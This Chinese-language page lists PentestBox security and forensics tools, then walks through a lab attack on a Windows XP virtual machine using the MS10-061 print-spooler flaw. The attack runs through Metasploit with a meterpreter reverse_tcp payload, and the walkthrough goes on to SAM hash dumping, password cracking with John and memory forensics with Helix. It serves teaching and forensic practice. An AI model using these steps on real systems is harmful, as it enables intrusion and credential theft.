    C:\Users\Demon\Desktop
    >responder
    

    SSlStrip

    它將透明地劫持網絡上的HTTP流量,監視HTTPS鏈接和重定向,然后將這些鏈接映射到類似于HTTP的鏈接或同源圖類似的HTTPS鏈接。它還支持提供圖標的模式,看起來像一個鎖圖標,選擇性日志記錄和會話拒絕。

    許可:GPLv3

    cmd.exe
    C:\Users\Demon\Desktop
    >sslstrip
    

    WinDump

    WinDump tcpdump的Windows版本,UNIX命令行網絡分析儀。WinDump完全兼容tcpdump和可以用來觀察,診斷并保存到磁盤網絡流量根據各種復雜的規則。

    許可:BSD

    cmd.exe
    C:\Users\Demon\Desktop
    >windump
    

    Wireshark

    Wireshark – Wireshark是世界上最重要的網絡協議分析器。 它可以讓你看到你的網絡在微觀層面上發生了什么。它是許多行業和教育機構的事實上(并通常是法律上的)標準。 Wireshark的發展蓬勃發展得益于全球網絡專家的貢獻。

    cmd.exe
    C:\Users\Demon\Desktop
    >wireshark
    

    Zaproxy

    OWASP Zed攻擊代理(攻擊)是一個易于使用的綜合滲透測試工具在web應用程序中尋找漏洞。是設計用于與廣泛的安全經驗的人,因此是理想的開發和功能測試人員是滲透測試作為一個有用的補充有經驗的筆測試人員工具箱。

    cmd.exe
    C:\Users\Demon\Desktop
    >zap
    

    4.12、取證工具

    Bulk Extractor

    bulk_extractor是一種計算機取證工具,用于掃描磁盤映像,文件或文件目錄,并提取有用信息而無需解析文件系統或文件系統結構。可以使用自動化工具輕松檢查,解析或處理結果。 bulk_extractor還創建了它找到的特征的直方圖,因為更常見的特征往往更重要。該程序可用于執法,國防,情報和網絡調查應用程序。

    作者:Simson l·加芬克爾

    許可:GPLv2

    cmd.exe
    C:\Users\Demon\Desktop
    >bulkextractor
    

    CapTipper

    CapTipper是一個python工具,用于分析,探索和恢復HTTP惡意流量。 CapTipper設置了一個Web服務器,該服務器與PCAP文件中的服務器完全一樣,并且包含內部工具,以及一個強大的交互式控制臺,用于分析和檢查發現的主機,對象和對話。

    cmd.exe
    C:\Users\Demon\Desktop
    >captipper
    

    DumpZilla

    Dumpzilla應用程序是在Python 3.x中開發的,目的是提取Firefox,Iceweasel和Seamonkey瀏覽器的所有取證有趣的信息進行分析。由于其Python 3.x開發,可能無法在舊的Python版本正常工作,主要是與某些字符。 在Unix和Windows 32/64位系統下工作。 在命令行界面中工作,所以信息轉儲可以通過管道重定向工具,如grep,awk,cut,sed …

    許可:GPLv3

    cmd.exe
    C:\Users\Demon\Desktop
    >dumpzilla
    

    Loki

    掃描儀的簡單指標妥協。檢測是基于四個檢測方法:

    國際奧委會文件名稱:正則表達式匹配完整的文件路徑和名稱

    雅苒規則檢查:雅苒簽名匹配文件內存和處理數據

    哈希校驗:比較已知的惡意散列(MD5、SHA1,SHA256)和掃描文件

    cmd.exe
    C:\Users\Demon\Desktop
    >loki
    

    Make PDF Tools

    make-pdf-javascript。py允許與嵌入JavaScript創建一個簡單的PDF文檔打開時將執行的PDF文檔。它本質上是mPDF膠水代碼。py模塊包含一個類方法來創建標題,間接對象,stream objects,stream objects和XREFs。

    作者:/迪迪埃·史蒂文斯

    cmd.exe
    C:\Users\Demon\Desktop
    >make-pdf-embedded
    cmd.exe
    C:\Users\Demon\Desktop
    >make-pdf-javascript
    

    Origami

    Origami是一個用于操作PDF文檔的Ruby框架。它具有PDF兼容的解析器,并允許分析,修改或創建惡意的PDF文件。 雖然它可能用于多種用途,但折紙主要用作安全工具。因此,它不專注于文檔的圖形內容,并且不包括PDF渲染器。

    許可:GPL

    cmd.exe
    C:\Users\Demon\Desktop
    >pdfsh
    

    pedump

    一個純ruby實現win32 PE二進制文件轉儲。

    作者:zed_0xff

    許可:麻省理工學院

    cmd.exe
    C:\Users\Demon\Desktop
    >pedump
    

    PDF Parser

    這個工具將解析一個PDF文檔識別分析文件中使用的基本要素。它不會呈現一個PDF文檔。

    作者:迪迪埃·史蒂文斯

    cmd.exe
    C:\Users\Demon\Desktop
    >pdf-parser
    

    pdfid

    這個工具不是一個PDF解析器,但它將掃描一個文件尋找某些PDF關鍵詞,允許您識別PDF文檔包含當打開。PDFiD還將處理名稱混淆。

    作者:迪迪埃·史蒂文斯

    cmd.exe
    C:\Users\Demon\Desktop
    >pdfid
    

    PeePDF

    peepdf是一個Python工具探索PDF文件為了找出如果文件可以是有害的。這個工具的目的是提供所有必需的組件安全研究員可以在不使用PDF分析 需要3或4工具的所有任務。與peepdf可以看到所有可疑的元素,在文檔中顯示的對象支持最常用的過濾器和編碼,可以解析一個文件的不同版本,對象流和 加密的文件。

    許可:GPLv3

    cmd.exe
    C:\Users\Demon\Desktop
    >peepdf
    

    rekall

    Rekall框架是一個完全開放的工具集合,在GNU通用公共許可證下的Python中實現,用于從易失性內存(RAM)樣本中提取數字工件。提取技術完全獨立于所研究的系統來執行,但是提供了到系統的運行時狀態的可見性。

    作者:谷歌

    許可:GPLv2

    cmd.exe
    C:\Users\Demon\Desktop
    >rekall
    cmd.exe
    C:\Users\Demon\Desktop
    >winpmem
    

    Volatility

    Volatility框架是一個完全開放的工具集合,在GNU通用公共許可證下的Python中實現,用于從易失性內存(RAM)樣本中提取數字工件。提 取技術完全獨立于所研究的系統來執行,但是提供了到系統的運行時狀態的可見性。該框架旨在向人們介紹與從易失性內存采樣中提取數字偽像相關的技術和復雜 性,并為這一令人興奮的研究領域提供進一步工作的平臺。

    作者:穩定的基礎

    許可:GPLv3

    cmd.exe
    C:\Users\Demon\Desktop
    >volatility
    

    4.13、無線攻擊

    Aircrack-ng

    Aircrack-ng 802.11是一個WEP和WPA-PSK密鑰破解程序,可以恢復密鑰一旦足夠的數據包捕獲。它實現了標準FMS攻擊以及一些優化KoreK攻擊,以及全新的PTW攻擊,從而使攻擊速度比其他WEP破解工具。

    許可:GPLv2

    cmd.exe
    C:\Users\Demon\Desktop
    >airbase-ng
    cmd.exe
    C:\Users\Demon\Desktop
    >aircrack-ng
    cmd.exe
    C:\Users\Demon\Desktop
    >aircrack-ng-GUI
    cmd.exe
    C:\Users\Demon\Desktop
    >airdecap-ng
    cmd.exe
    C:\Users\Demon\Desktop
    >airdecloak-ng
    cmd.exe
    C:\Users\Demon\Desktop
    >aireplay-ng
    cmd.exe
    C:\Users\Demon\Desktop
    >airodump-ng
    cmd.exe
    C:\Users\Demon\Desktop
    >airolib-ng
    cmd.exe
    C:\Users\Demon\Desktop
    >airtun-ng
    cmd.exe
    C:\Users\Demon\Desktop
    >besside-ng
    cmd.exe
    C:\Users\Demon\Desktop
    >easside-ng
    cmd.exe
    C:\Users\Demon\Desktop
    >ivstools
    cmd.exe
    C:\Users\Demon\Desktop
    >kstats
    cmd.exe
    C:\Users\Demon\Desktop
    >makeivs-ng
    cmd.exe
    C:\Users\Demon\Desktop
    >packetforge-ng
    cmd.exe
    C:\Users\Demon\Desktop
    >tkiptun-ng
    cmd.exe
    C:\Users\Demon\Desktop
    >wesside-ng
    cmd.exe
    C:\Users\Demon\Desktop
    >wpaclean
    

    4.14、文本編輯器

    使PenetestBox更棒,我補充道原子和vim文本編輯器。打開后原子會絕交Atom一邊和終端的屏幕另一方面,雖然vim運行在相同的選項卡。原子分裂做是為了使報告更容易給控制臺訪問和編輯相同的屏幕上。

    cmd.exe
    C:\Users\Demon\Desktop
    >atom
    cmd.exe
    C:\Users\Demon\Desktop
    >vim
    

    4.15 瀏覽器

    PentestBox還包含一個修改后的版本Mozilla Firefox所有的安全插件前安裝。查看所有以前安裝的插件,點擊在這里

    cmd.exe
    C:\Users\Demon\Desktop
    >firefox
    

    同時,我們已經包括在內SQLite瀏覽器在里面。

    # 1、什么是Metasploit

    Metasploit Framework是一個開源滲透工具,Metasploit滲透測試框架擁有世界上最大的公共測試漏洞數據庫。簡單來說,Metasploit可以用來檢測安全漏洞,另一方面它也可以用來進行入侵。

    # 2、什么是Helix

    安全事件響應和取證工具

    # 3、什么是打印后臺程序服務模擬漏洞 (CVE-2010-2729)

    利用MSF中的攻擊模塊:ms10_061_spoolss

    Windows打印后臺程序沒有充分的限制訪問該服務的用戶權限,攻擊者可以通過提交特制的打印請求在Windows系統目錄(%SystemRoot%\system32)中創建文件。

    攻擊者可指定任何文件名,包括目錄遍歷,通過發送 WritePrinter 請求,攻擊者可以完全控制創建文件的內容。

    將文件寫入到Windows系統目錄(%SystemRoot%\system32)后,通過WMI來部署惡意程序,因為系統會自動運行%SystemRoot%\System32\Wbem\MOF文件夾的mof文件、執行命令。

    該漏洞首次被發現并被應用于著名的Stuxnet蠕蟲(俗稱“震網”)

    # 4、實驗環境

    攻擊機:Kali linux 目標機:Windows xp sp2

    # 5、實驗步驟

    # 5.1 使用Nmap掃描目標機器是否存在 NetBios 和 RPC服務

    # 5.2 NetBios共享檢測

    # 5.3 使用MSF的 ms10_061_spoolss 模塊攻擊目標機

    # 5.4 收集基本取證文件

    # 5.5 使用Helix遠程內存取證

    # 5.6 下載基本取證文件

    # 6、下載 Helix ,略

    # 7、設置目標機環境

    # 1、獲取目標機ip

    # 2、創建共享打印(默認是沒有共享打印的)

    1)打開控制面板,雙擊“打印和傳真”

    2)添加打印機,右鍵選擇 添加打印機

    本地打印機,不勾選“自動檢測和安裝驅動”

    選擇 使用 LPT1 端口

    選一個打印機廠商和型號,我們隨便選一個

    給打印機取個名字

    選擇共享這個打印機

    不打印測試頁

    完成設置

    # 8、在Kali上檢測打印共享

    1)nmap 掃描

    nmap -sS -sU -O -p137-139,445 192.168.1.149
    

    2)查找 NetBIOS 名稱

    nmblookup -A 192.168.1.149
    

    NetBIOS工作站名字:WXPSP2

    NetBIOS組名:MSHOME

    Master Browser:_MSBROWSE_

    第二列解釋:NetBIOS后綴

    00:Workstation Service(workstation name) 類型:Group

    03:Windows Messenger service

    06:Remote Access Server

    20:File Service(also called Host Record)

    21:Remote Access Service client

    1B:Domain Master Browser-Primary Domain Controller for a domain

    1D:Master Browser

    第四列:節點類型

    B-node:0x01 Broadcast

    P-node:0x02 Peer(WINS only)

    M-node:0x04 Mixed(broadcast,then WINS)

    H-node:0x08 Hybrid(WINS,then broadcast)

    # 9、訪問SMB資源

    smbclient -L \\\WXPSP2 -I 192.168.1.149 -N
    

    看到了打印共享

    # 10、使用MSF進行攻擊

    1)載入模塊,查看需要配置的參數

    2)配置參數

    3)設置payload

    set PAYLOAD windows/meterpreter/reverse_tcp
    

    4)設置payload參數

    5)攻擊

    攻擊完成后,建立了遠程會話

    惡意程序被寫入到目標機的%SystemRoot%\system32\g9bMJIYNoBtyOS.exe,此程序運行后反彈了一個shell給Kali,從而建立了一個Meterpreter會話。請記錄這個程序的名字,后續會用到

    而惡意程序是通過%SystemRoot%\system32\wbem\mof\kT044wvLBYxwGk.mof控制運行的

    6)接下來我們可以執行一系列操作

    6.1)getuid,getpid

    可以看到我們獲取了系統的system權限,getpid得到的是當前Meterpreter會話的進程ID,記住這個PID

    6.2)執行shell,可以直接進入目標機的命令行界面

    6.3)查找PID 392關聯進程

    可以看到正是前面我們寫入的那個惡意程序

    6.4)查找PID 392 關聯的網絡鏈接

    # 11、進行基本的信息收集取證

    11.1)進程信息收集

    tasklist > forensics_tasklist.txt
    

    11.2)網絡信息收集

    netstat -ano > forensics_netstat.txt
    

    11.3)目錄文件信息收集

    dir > dir_forensics.txt
    

    11.4)退出shell

    # 12 、獲取SAM數據庫信息

    利用hashdump獲取SAM數據庫

    SAM是Windows XP,Windows Vista和Windows 7中存儲用戶密碼的數據庫文件

    將獲取到的信息復制到一個文本文件

    # 13 、建立遠程取證收集環境

    # 14、收集受害者內存信息

    1)加載 Helix2008R1 光盤

    2)收集信息

    選擇 Live Acquisition,填寫相關信息。

    等待內存信息收集完成

    取證完成,會自動關閉此cmd窗口

    3)查看收集的文件

    # 15、下載其他取證文件

    下載我們之前收集的進程信息,網絡信息和惡意程序

    download C:\\WINDOWS\\system32\\forensics_tasklist.txt /forensics/ms10_061/
    download C:\\WINDOWS\\system32\\forensics_netstat.txt /forensics/ms10_061/
    download C:\\WINDOWS\\system32\\dir_forensics.txt /forensics/ms10_061/
    download C:\\WINDOWS\\system32\\g9bMJIYNoBtyOS.exe /forensics/ms10_061/
    

    # 16、使用John 破解密碼

    成功破解了管理員密碼

    信息收集完成,后續我們將使用Volatility從抓取的內存進行分析

網站首頁   |    關于我們   |    公司新聞   |    產品方案   |    用戶案例   |    售后服務   |    合作伙伴   |    人才招聘   |   

友情鏈接: 餐飲加盟

地址:北京市海淀區    電話:010-     郵箱:@126.com

備案號:冀ICP備2024067069號-3 北京科技有限公司版權所有